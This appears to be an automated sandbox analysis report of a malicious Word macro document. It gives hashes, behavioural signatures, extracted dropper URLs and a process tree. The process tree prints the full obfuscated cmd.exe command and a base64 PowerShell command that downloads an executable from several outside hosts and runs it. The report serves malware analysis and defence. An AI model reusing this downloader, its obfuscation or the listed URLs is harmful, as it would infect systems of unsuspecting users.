Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    17-05-2024 03:30

General

  • Target

    4e3d58b5d115458a833d3711afabdf05_JaffaCakes118.doc

  • Size

    129KB

  • MD5

    4e3d58b5d115458a833d3711afabdf05

  • SHA1

    9082655f02d2f245f31fca2bcef0f8c7cb2fc6f6

  • SHA256

    f2a96d734ba2658553118ab70fa59004e74040116ed4a588f37e509bb0841f34

  • SHA512

    a136b49bd2fb2dd17e5ca58bb0fbfa3fbfaf92c5ef674b483aa2820c48cfae4fc74a39def032eeda488b1831ae4231622d0692b89eb0e17e9780f3d25d3a1f98

  • SSDEEP

    1536:7ptJlmrJpmxlRw99NBD+aEBV2ABDrtGcONzhSTSriGcNdrBgZI916TJaQ91:Vte2dw99fc96AxGcdgE16r

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://jobarba.com/wp-content/dstf6

exe.dropper

http://lightbox.lbdev.co.uk/WHl239

exe.dropper

http://challengerballtournament.com/5Evo

exe.dropper

http://thepresentationstage.com/V5mXOIOH

exe.dropper

http://demo.58insaat.com/tuGN6FS

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4e3d58b5d115458a833d3711afabdf05_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2424
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /V^:^oN^ /c "^se^T ^ ^ ^ R^0=^LF^M^A^z^K^P^G^Q^Sw^zkDS^P^aOFb^tKvl^3R^d^6=^i^5^2^u-N^q^h8^E^Xr^YCm9^gs^jo^f^ VHJ7cneT^0^Bp^y^1^W^U^4IZ&&^FOR %^S ^IN ( 6^1^ 48^ ^ ^1^0^ 57^ ^40 ^4^6 ^ ^ ^36^ ^ ^5^7^ ^23 2^3 ^ 50^ ^3^3 ^57 50 53^ ^ ^3^ 60 ^ ^ ^15 3^ ^ ^ ^3^8^ ^ ^48 ^ ^3 55^ ^3^ ^3 ^ ^4^4 ^3 ^7 ^ 66^ ^3^ ^68^ 8 6^0^ 2^4^ 3^ ^4^2 5^9 ^ ^ 3 ^ ^1^9^ 10^ ^ ^60^ ^ ^ 29 ^ ^3 ^ ^ 7^ ^ ^ 48^ ^ 3^ ^68 ^8^ 60 47 ^ 3^ ^ ^5^2^ ^ ^ 8 3^ ^6^7 ^ 3 ^60 1^7 ^ ^ ^ ^3 ^7^ ^6^5 ^3^ ^ ^2^6 ^ ^3 ^ ^ 3 ^ ^ 3^2^ ^ 3 ^ ^18^ ^ 55^ 3^ ^ ^ 6^8 8^ 6^0^ ^ ^2^9 ^ ^ 3 38 ^ 2^ 3 1^9^ ^ ^ 3^ ^ 60 6^1 3^ ^ 7 ^6^5^ 3 ^19 4^5 60 ^ 59 ^ 3^ ^ ^1^3 ^46^ ^3^ ^ 5^3^ 3 ^60^ ^ 2^7 ^ ^ ^3 ^18^ 12^ 3 ^ ^1^6 ^ ^45^ ^ 3^ ^44^ ^3^ ^4^2^ ^ 55^ 3 ^ ^ 1^6^ ^3 ^ 60^ 59^ 3 52 ^ ^ 8^ 3^ 55 ^3 ^ ^3^ ^27^ ^ ^ ^3 4^2 3^7^ ^3^ ^0 1^0 ^ 6^0^ ^35 ^ ^ ^3^ ^ ^7^ ^3^7^ 3 ^ ^ 4^1^ 4^5^ ^60 ^ ^ 3^6 ^3^ 5^2^ ^67^ ^3 ^4^1 45 6^0^ ^36 ^3^ ^ 4^2^ ^ ^66 3^ ^ ^ ^4^1^ ^10^ ^60^ ^ ^22^ 3 ^7 ^ ^ 5^9 ^ 3 ^0 ^ ^ 1^0 ^60^ ^2^4 ^3^ ^ 5^2 3^ 3 ^ ^ 0^ 8 ^ 60^ ^47 ^ ^3 ^ 7 ^ ^37 3^ 1^9 4^5^ 6^0 ^ ^ ^ 59^ 3 ^ ^7 ^ ^ ^ ^6^5 ^ 3 ^19 ^4^5^ ^60^ ^ ^ 5^9^ ^ 3 ^4^2^ 37^ ^3 ^68^ 3^ ^60^ 1^1^ 3^ ^ ^ 5^2 ^8 3^ 6^8 ^45^ ^ ^3 ^31^ ^3^ ^3^8^ 3^ 3^ 1^6^ 3 ^6^0^ ^ 59^ ^ ^3^ 5^2 ^8 ^ 3 ^5^5 3^ 3^ ^ ^ 27 3 ^ 42^ ^ ^37 ^3 ^ 0^ ^1^0 ^ ^ 6^0 ^ ^46^ ^3 ^7^ ^ 12^ 3 6^8 ^10 6^0 48 ^3^ ^ ^52 ^ 8^ 3^ ^ 4^1^ 4^5^ ^ 60 ^ ^ ^ 22 ^ ^ 3 ^5^2 ^4^5 ^ ^3 ^0^ ^4^5 ^6^0^ ^ ^ 46 ^ ^ ^3^ 7^ 67 ^ ^ 3^ ^ 6^8 ^3^ 6^0 2^3 ^ ^3^ 5^2 4^1^ ^3 ^0 ^ 4^5^ ^60^ 47 ^3^ ^7 ^ ^ ^ ^3^7 ^ ^ ^3^ 0 ^ ^ ^ ^4^5 ^ ^ ^ 60 ^6^3^ 3^ 7^ 4^6^ ^3^ ^ ^0^ ^ 1^0 ^ ^6^0 39 ^ ^3 38^ ^4^5^ ^ ^3 1^9^ ^3 ^ ^ ^3 ^6^2^ ^ 3^ 13^ ^ 2^ 3 ^ 1^7^ 8^ ^ ^ ^60^ 3 ^ 3^ ^7 ^ ^ ^45^ ^ ^ 3^ 2^6 3 60^ 59^ ^ 3^ ^ 52 ^ 3 ^3^ ^1^7 ^ 45^ ^ ^ ^3 2^2^ 3 4^2 ^ ^ ^ ^37^ ^ ^ 3 4^1^ 10^ ^ 6^0^ ^ ^ ^ 48^ ^ 3^ ^ ^ 7^ 3^8 ^3 ^ 1^9^ 3^ ^6^0^ 4^6 3^ ^7 ^6^5^ ^3^ ^ ^1^9^ ^ ^ ^4^5^ ^60 ^ ^56^ 3^ 7^ 65 ^ 3 55^ ^45 ^6^0^ ^29^ 3^ ^ ^ ^ ^7^ ^ 38 ^3^ ^ ^1^9 3^ ^60^ ^4^6^ ^ ^ ^ ^3^ ^ ^52 ^ ^8 ^3 ^19^ ^ 10^ ^6^0^ ^6^3 3^ ^ 52 6^7^ ^3^ ^ ^ 19^ ^ ^ ^4^5^ ^ ^ ^60 ^ ^ ^ 3^6^ ^ ^ ^3 ^ ^ 7^ ^ 5^9^ ^3^ 6^8 ^ ^ 8 6^0 32^ ^ ^3^ ^ ^52^ ^ ^8^ ^3 ^0 ^ ^45 60^ ^47 ^ 3^ 7^ 37^ 3 ^1^9 ^ ^8^ ^3^ 2^2^ 3^ ^ 1^3 ^ ^ 65^ 3^ ^ 2^5 ^ ^8^ ^ ^ ^ 60^ ^ 31 ^3 ^ ^7^ ^ ^ ^3^7^ ^3^ ^8 3 ^60 4^8 ^ 3^ ^52 ^ ^8 ^3^ 2^6 ^3 ^6^0 ^1^0 3 ^13^ 4^8 3 0 ^1^0 ^ 3 22 ^ ^ ^ 3^ ^ ^ 52 ^8^ ^ 3 1^6^ ^3^ 6^0^ 23^ 3^ ^5^2 ^ ^3 3 ^55 ^ 45^ ^60 2^3^ ^ ^ ^3 ^ 52 ^ ^ ^2^ ^3^ ^ ^68^ ^ 8^ 60 ^ ^3^2 3 ^5^2 ^ 8^ 3 ^ 41^ ^8^ 60 ^ ^5^9 ^ ^3 ^ ^7^ ^ ^ ^ ^12^ ^ ^ ^3^ 19 10^ ^ ^ ^6^0 3^2 ^ ^3 5^2 ^ ^ ^2^ ^3^ 2^6^ ^3 ^ 6^0 ^ 3^6 ^ 3^ ^ ^7^ ^55 ^ 3 ^68 ^ ^ ^8^ 3 ^32 ^ ^3^ ^7 ^2^ ^ 3 1^9^ ^ ^ ^ 10^ ^60^ ^ ^20 ^ 3^ ^ ^ ^4^2^ ^3^7 3 ^5^1 45 3 ^63 ^3^ ^ ^7 59 ^ ^ ^3^ ^64^ 3^ ^ 6^0 ^ 1^5^ 3^ ^ ^ 38 ^ ^ ^1^2 ^ ^3 ^5^8 ^1^0^ ^ ^6^0^ ^ ^6^7^ ^ 3^ ^ ^ ^3^8^ ^3^ ^ 3 ^16 ^ ^3 ^ ^ 6^0^ ^ 59^ ^ ^ 3 ^ ^ ^52 ^ ^8^ ^3 ^5^5 3 3^ ^27 ^3 42^ ^ ^37 ^3^ ^0^ ^ 1^0^ 60^ ^ ^12 ^3 ^ ^7^ ^65^ ^3^ 1^9 ^ ^ ^8 ^6^0^ ^ ^ 22^ ^3^ ^ ^ 42^ 66 ^ ^ ^ ^3 ^ ^ 34 ^8^ ^ 3^ ^6^6^ ^ ^3^ ^ ^ ^7 ^ ^ ^12 ^ ^3 ^1^9^ 4^5^ 60^ ^11 ^3 ^ ^ ^7 3^8^ ^3^ 4^1 8^ ^ ^60 ^ ^5^9 3^ ^ ^4^2^ ^6^6 ^ ^ 3 ^ ^41^ 10^ ^6^0 ^ ^2^2 ^3^ ^ ^7 5^9^ ^ 3 ^ 0^ ^10^ 6^0 ^ 59 ^ ^ ^ 3 ^ ^ 52^ ^ ^ ^6^5^ 3^ ^25^ 10 60^ ^ ^ 17 3^ ^ ^ 1^3 ^4^1^ ^ ^ ^ 3^ 25^ ^4^5 ^60 ^58 ^3 4^2^ 55 ^ 3 ^ ^0^ 4^5^ 6^0 ^ ^5^8^ 3^ ^ ^ 52 3 ^ ^3 ^ ^ ^19 ^ ^ 3 ^60^ 61^ 3 5^2 8^ ^ ^ ^3 ^2^1 ^ ^3^ ^3 ^ ^ ^ ^5^6^ ^ 3 3^8^ ^ ^ 3 3 ^ ^53 1^0^ 3^ ^61^ ^ 3 ^13^ 4^6 ^ ^ ^3^ 53^ ^ 3 ^6^0 ^ ^6^0^ 3 ^ 7^ ^6^6^ ^3 ^ 1^4 ^ 3^ ^ ^ 3 45^ ^3^ ^ ^ ^ ^13^ ^ ^ ^ 59^ ^ ^3 ^67 ^3^ ^3^ ^56 3^ 13 6^7^ ^ ^ 3^ ^ ^ ^2 3 ^3^ ^ 11^ 3^ ^4^2 ^5^5 ^ 3^ ^ 1^7^ ^ ^ ^1^0^ ^ ^3^ ^ 1^2^ ^ 3 ^5^2 ^48^ ^ 3^ ^58^ ^ ^ 4^5 60 ^68^ ^ ^ 3 1^3 ^ ^5^9^ ^3^ ^ ^ ^ 53^ ^ 3^ ^ ^ 6^0^ ^23^ ^ ^ ^3^ ^ 7^ ^ 6^6 3 ^ 2^6^ 4^5 ^3 2^7 ^3 52 ^ ^3 ^3^ ^26^ ^8^ ^6^0^ 2^9 3^ ^ 7 ^ ^ ^ 10^ ^ 3 ^16^ ^ ^8 ^6^0 47^ 3 ^ ^4^2^ 46^ ^ ^ ^ 3 ^53 10 6^0^ ^5^5 ^3^ 4^2^ ^ 55^ 3 2^1 ^ ^1^0^ ^ ^3 ^ 1^2 3^ 3^8 ^ 3^8 3^ ^ ^ 19^ ^45 60 ^ ^6^7 3^ 4^2 ^ ^46 ^ ^ ^3 ^5^3 ^ ^ ^10 3 ^ ^ ^ ^3^2 3 ^ 7 ^65 ^ ^ ^3 ^57^ 3 6^0^ ^2^3^ ^3^ ^42 ^ ^5^5^ 3 ^ ^ ^1^7 10^ ^ ^ ^6^0^ ^ 4^3 3 7 ^ 37 ^3 ^ ^5^5 ^45 ^6^0 ^ ^ ^ ^2^3^ ^ ^3 ^7^ ^ ^38^ 3^ ^ ^4^1 10 60^ ^ ^4^8 ^3 ^42^ 4^5^ ^3^ ^ 53 3 ^ 6^0 ^ 61^ ^3 ^ ^18 45^ 3 1^6^ ^ 1^0 ^ ^3^ ^45^ ^ ^ ^3^ ^ ^ ^ ^7 ^ 12 ^ 3 ^ ^1^9^ ^ ^ ^4^5^ ^3 ^4^5 3 ^42^ 8 ^ ^ 3 ^ ^ 57 45 6^0^ ^ ^6^8^ 3^ ^7^ ^ 48 ^3^ ^21 ^ ^8^ 6^0 ^54^ ^3 5^2^ 8 ^ ^ 3^ ^5^5^ ^45 ^ ^ ^60 3^0 ^ ^ 3 ^5^2^ ^ ^46 3^ ^53 ^ ^ ^3 ^ 6^0^ ^15 ^ ^ ^3 3^8 48^ 3^ 5^5^ ^ ^ 3^ ^3^ ^ 3^2^ ^ ^3^ ^ ^38 ^8^ ^3 ^ ^ ^1^9^ ^ 10^ ^ 60^ ^ ^ 2^4^ 3^ ^ 7 ^6^6 ^ ^ ^ ^3^ 19 ^3 ^60 ^ ^ ^ ^22 3 7 ^ 3^8^ ^ 3^ 6^8^ ^ 3^ ^ ^ 60 ^7 ^3 ^7 ^ 12 3^ ^19^ 3^ 60 ^ 23^ ^ ^ ^3^ ^42^ 45 ^3^ ^ 5^3^ 3^ ^6^0 ^ ^6^1 ^ ^3^ ^ 1^8^ 45 3^ ^16^ ^1^0^ 3 4^6^ ^ ^ ^3 4^2^ ^ ^3^ ^ ^3 ^ ^ ^53^ ^3^ ^ ^ 6^0 ^27^ ^3^ ^3^8 ^6^6 ^3^ ^64 8^ 3 ^ 61 3^ ^ ^1^3^ ^ ^ 4^6 ^ ^ 3^ ^ 1^4^ 8 ^6^0 ^ ^3^2^ ^3 ^ ^ ^5^2 ^ ^ ^ 41 ^3^ ^ ^19 ^1^0 ^6^0^ 4^0 ^3 ^7 ^ ^ ^6^5 ^ ^3^ 0 ^ ^8 ^60^ 53 3^ ^ ^ 5^2 ^8^ ^ ^3 ^68^ 8^ 6^0 ^20 ^ 3^ 4^2^ 3^ 3^ ^ ^53 3^ ^ ^ ^60^ ^27^ ^ ^ ^3^ ^ 38 6^6^ ^3^ ^ ^6^4 ^ 8 3 ^ 5^4 ^ ^ ^3^ ^7 ^67^ ^3 ^ 5^5^ ^4^5^ ^ 60 2^3 ^ ^ 3 7^ 3^8 ^ ^3^ 16^ ^1^0^ ^ 3^ ^ ^ 5^4 3^ ^5^2 ^ 59^ ^3 ^ ^ ^ ^41 10 ^ ^6^0 36^ ^ 3^ 52^ ^8^ ^ ^3 ^41^ ^10^ ^ 6^0 ^ 48 ^ ^3^ 52 ^46 ^3 49^ ^8^ ^60 ^4^4 ^ ^ ^3^ 42^ 3^ ^3^ 67^ 3 3 45 3^ ^4^2 ^3 ^ ^3^ 6^7 ^ ^ ^ 3^ ^3 ^ ^4^5^ ^3 ^ ^4^2 3^ 3 67 ^3 ^ 3^ ^ ^4^5^ 3 4^2^ 3 3 6^7^ ^ 3^ ^ 3^ ^ ^45^ ^ ^ ^3 4^2^ 3 ^ ^ ^3 6^7^ ^ 3 ^3 ^ ^ ^ 45 ^3 ^4^2^ ^ 3 ^ 3 ^ ^ ^6^7^ 3 ^ ^3^ ^2^8 ^6^9) ^D^O S^e^T ^or^d=!^or^d!!R^0:~ %^S,1!&& ^I^f %^S G^tR ^68 C^a^l^L %^or^d:^~ ^ ^ 5% "
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3272
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABPAEoAcAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFkAagA9ACcAaAB0AHQAcAA6AC8ALwBqAG8AYgBhAHIAYgBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZABzAHQAZgA2AEAAaAB0AHQAcAA6AC8ALwBsAGkAZwBoAHQAYgBvAHgALgBsAGIAZABlAHYALgBjAG8ALgB1AGsALwBXAEgAbAAyADMAOQBAAGgAdAB0AHAAOgAvAC8AYwBoAGEAbABsAGUAbgBnAGUAcgBiAGEAbABsAHQAbwB1AHIAbgBhAG0AZQBuAHQALgBjAG8AbQAvADUARQB2AG8AQABoAHQAdABwADoALwAvAHQAaABlAHAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAHMAdABhAGcAZQAuAGMAbwBtAC8AVgA1AG0AWABPAEkATwBIAEAAaAB0AHQAcAA6AC8ALwBkAGUAbQBvAC4ANQA4AGkAbgBzAGEAYQB0AC4AYwBvAG0ALwB0AHUARwBOADYARgBTACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABBAG4ASAAgAD0AIAAnADIAMAAzACcAOwAkAHoATgBZAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAEEAbgBIACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABpAFgAawAgAGkAbgAgACQAegBZAGoAKQB7AHQAcgB5AHsAJABPAEoAcAAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABpAFgAawAsACAAJAB6AE4AWQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJAB6AE4AWQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3508

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      a285f223ad8dc6074dd757a49acac8c6

      SHA1

      8c789a7d06c33796f96d8e298f38eacb9901cc40

      SHA256

      0ff1085ac2b87a6d4f7eda5a8d165749ebb93c94c7e4dbb1b998474cc327f4b8

      SHA512

      e1fd2b2be78fe61fced84ec6b541f919845d76456ec864ce2b63cb5c7a0b12d43edee318b5710c560d57d60e52e9122b2246fd8d774b12cc91f367dabac0b836

    • memory/2956-23-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-150-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-6-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-11-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-22-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-29-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-70-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-21-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-50-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-19-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-28-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-27-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-26-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-25-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-24-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-0-0x000000002F2D1000-0x000000002F2D2000-memory.dmp

      Filesize

      4KB

    • memory/2956-20-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-2-0x00000000715ED000-0x00000000715F8000-memory.dmp

      Filesize

      44KB

    • memory/2956-49-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-18-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-17-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-16-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-15-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-14-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-13-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-12-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-10-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-9-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-8-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-7-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-448-0x00000000715ED000-0x00000000715F8000-memory.dmp

      Filesize

      44KB

    • memory/2956-449-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2956-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2956-465-0x00000000715ED000-0x00000000715F8000-memory.dmp

      Filesize

      44KB